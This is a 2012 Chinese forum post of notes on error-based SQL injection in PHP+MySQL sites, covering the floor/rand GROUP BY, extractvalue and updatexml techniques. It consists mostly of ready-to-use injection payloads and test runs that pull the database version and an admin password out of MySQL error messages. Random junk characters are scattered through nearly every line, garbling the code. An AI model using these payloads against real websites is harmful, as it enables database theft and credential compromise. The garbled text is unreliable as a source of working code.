放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
! U( U% Y G9 o: c8 x& q实际测试环境:
! y4 W, W' M! r, B' w6 x1 o4 A1 B
& `, k9 }9 v) ]: F : V& m4 q% O: q4 l: b" C1 t6 X& d
mysql> show tables;* k( H. W/ _& j; Z9 o& U
+----------------+6 L1 S3 x9 d2 G3 v, D4 t
| Tables_in_test |
5 n1 X+ M3 z2 E3 Y9 H+----------------+
k3 \6 D: l$ w( m5 H; I| admin |
- K2 N; e C' [# O. I$ f5 S( i| article |4 q3 u1 A( \2 C f
+----------------+/ q% ?9 ?" e4 [: M
+ K: \+ @$ E$ t; X# o, z" a9 B
0 z% q) a* p. R ; E" C- V( k, Q# I5 s f
mysql> describe admin;& {3 v3 r5 S. f* \
+-------+------------------+------+-----+---------+----------------+' ?8 s j# J$ K
| Field | Type | Null | Key | Default | Extra |1 B, w5 Y% Q' p, V
+-------+------------------+------+-----+---------+----------------+
$ ^+ A% ^7 W) r# b& K| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
5 n. T E+ F5 D, X+ v8 _| user | varchar(50) | NO | | NULL | |
" _$ F/ ?# x9 |" G \. P. b: {% m| pass | varchar(50) | NO | | NULL | |
/ |1 q3 r7 x @: ]7 Z9 E+-------+------------------+------+-----+---------+----------------+
6 X3 Z$ o* `5 L3 ~( ?2 C # e7 f( m3 m5 i8 f' W
& L. J0 w- q9 q0 M
5 u* P! B( r, j% H- X; U5 j. Y# u$ nmysql> describe article;
( N) Y: E. B/ H' q, S+---------+------------------+------+-----+---------+----------------+, r5 I4 c' o1 _- E# a8 u
| Field | Type | Null | Key | Default | Extra |3 e4 g8 r( z! i8 e5 u
+---------+------------------+------+-----+---------+----------------+9 a7 b. [9 K( K0 S/ K( z: ~
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |" o; d: q# L. W: z8 e, ^
| title | varchar(50) | NO | | NULL | | }: X3 z& D0 H% r% C* m
| content | varchar(50) | NO | | NULL | |
6 T, g. L( d- }7 n+---------+------------------+------+-----+---------+----------------+5 s4 t, K8 N) j. `% w) r! } ]
1、通过floor报错
$ a" V( r( R1 z* Y" I3 I可以通过如下一些利用代码
+ i: }: [. [6 J# H- a2 w% w! @# \
4 d. y3 v9 d9 f, n/ z0 k
/ o! z }7 q, f& ?and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
& [5 h* ^+ A" D% S3 @- kfrom information_schema.tables group by x)a);
( h1 x! p/ h: `; v
X: @, Y$ N P# w' F8 a 8 y3 B$ l+ c0 \/ z0 `
and (select count(*) from (select 1 union select null union select !1)x
5 ^4 Z. Y6 r9 G, k3 S- Dgroup by concat((select table_name from information_schema.tables limit 1),
8 b- \6 _+ P) U* Q) R% G9 T! pfloor(rand(0)*2)));* ^' R( E. v" y- Y9 v0 X
举例如下:' X/ b) G5 b: _( }3 W4 L: `8 C& D
首先进行正常查询:
( |# [8 G8 j n# e0 e3 C- ^
) p! j$ x$ D( ]mysql> select * from article where id = 1;
; V r1 x% f! _+----+-------+---------+. }* B" Z* m, m" o7 J, R
| id | title | content |6 d6 m- ]5 ^5 w0 ]0 O) l
+----+-------+---------+
. c3 P: y, i$ r6 o7 V1 A2 D) n# G| 1 | test | do it |9 L/ y0 T1 \1 k6 t6 q/ w
+----+-------+---------+
h0 `) r( n8 x* E; b0 h1 X( ^假如id输入存在注入的话,可以通过如下语句进行报错。
* N- c5 J; {8 \& }3 E3 y2 H2 K
/ ~. Z7 O7 ]& N( P. I, j2 I. z/ u
& f/ e5 U6 I. D6 \mysql> select * from article where id = 1 and (select 1 from
1 N/ K7 ]9 ^8 ?, K(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 m4 _+ e3 S7 }4 G( K$ C. r$ z
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
3 v8 ^5 o9 A! U; `2 I可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。/ q# }7 M! [) _+ S& d- z* K
例如我们需要查询管理员用户名和密码:
! t& z1 {& v( v+ R" v4 b. O- w2 E( WMethod1:
( J3 v/ @, E- u! {2 E : e! q& E$ W6 h1 k8 ~% z- W) U
" ~4 p" v$ `% G( J' k
mysql> select * from article where id = 1 and (select 1 from# C" X7 F/ c, q7 t2 N( D6 G% U
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
$ |% d7 Q c, j- \, Y& Qfrom information_schema.tables group by x)a);
2 M0 e; L+ F( |$ {; Y+ Z9 w' p2 WERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
8 ]. t( O7 K0 R. MMethod2:1 r0 q, j0 d i X, p
, q: v* f. f6 L. `6 ^
7 z, P/ t* W0 x. i* c; G+ Omysql> select * from article where id = 1 and (select count(*)
: B. D* a3 Z4 I' h* C$ D4 X4 L3 cfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1), j9 A0 @! S- I, [
floor(rand(0)*2)));
y8 u W2 p1 J5 S+ o' gERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
3 L+ z3 s( t; W- ?1 f2、ExtractValue
7 x; T) Y* X0 Z: z2 m+ e测试语句如下! f4 p5 w8 }+ y0 x' Z$ U$ s& r
$ n0 I; @, B; x) m+ e) x' E
8 j( B+ ?1 T- o& b- }% I
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));+ P) X& z* y3 v+ U0 V1 p
实际测试过程 j& X, n7 o, j |
. x) f1 ], F2 E, l
, g/ R# X! w( C3 O" O$ Tmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,, E0 F- f( ?3 k8 Y4 h! Y, y0 e
(select pass from admin limit 1)));--
, Z3 N% O8 U/ c: i- [ERROR 1105 (HY000): XPATH syntax error: '\admin888'; ~& r$ ~0 w/ V- w
3、UpdateXml$ ` G4 o1 \. b4 v& N! v' V+ ~
测试语句
5 H. ]# K, q. J$ m; p; m- g
) E4 o( c% L; }9 ` 5 R7 L+ g& V% D$ a+ e1 U
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
8 |. Y/ b% L2 \: m实际测试过程
5 l4 [* C2 I) X
2 g8 H: c# A" q& r( O( T
( Z7 X) d+ ~$ h$ d* j+ |mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,8 X/ H$ ?5 y- W/ d# s% g. i7 m# F1 J
(select pass from admin limit 1),0x5e24),1));9 v: V' G4 F+ n& F
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$' L( \' S# K8 C) C) q" L7 f
All, thanks foreign guys.) ]* m- z* p7 g8 i# Z
; u) T# J# c+ y% u3 ~6 j, B; M: f
% r2 e5 [5 G( U0 h |
发表于 2012-12-10 10:28:51
收藏
支持
反对